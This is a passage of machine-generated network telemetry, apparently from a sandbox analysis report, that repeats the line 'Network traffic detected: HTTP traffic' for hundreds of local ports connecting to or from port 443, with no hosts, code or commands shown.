                      Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62447 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62460 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61134 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60229 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63315 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59289 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62459 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57047 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63327 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61543 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59277 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60291 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60217 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51307 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62002 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60687 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52621 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61146 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53849
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65521 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53537 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62496 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57023 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61158 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63700 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62868 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65533 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51207
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51205
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51209
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51203
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65508 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51201
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62472 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49499 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53525 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62484 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51219
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51217
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51211
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53875
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51213
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60663 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61555 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60651 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49487 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55299 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61183 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62893 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61976 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61567 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53501 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64219 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59649 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55287 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64207 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64604 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61579 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53513 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59241 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49475 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63131
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63130
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51143
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51149
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51147
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56623 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59637 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63122
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63121
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63123
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63127
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65089 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63140
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64256 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63142
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51155
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51159
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51157
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51163
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51161
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63133
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63132
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63134
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64232 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63136
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56635 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63150
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63152
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64268 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63143
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63146
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63148
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63147
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59625 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63149
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63161
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63163
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51177
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61195 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64220 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51179
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51185
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51183
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63157
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63159
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51109
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59601 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51107
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54395 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51103
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63376 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57503 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51119
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56659 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51117
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51111
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51115
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51113
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59613 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65090 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51123
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57493 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51127
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63388 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51125
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63107
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63109
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63102
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63103
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51139
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63120
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51133
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51131
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51137
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51135
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56647 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63119
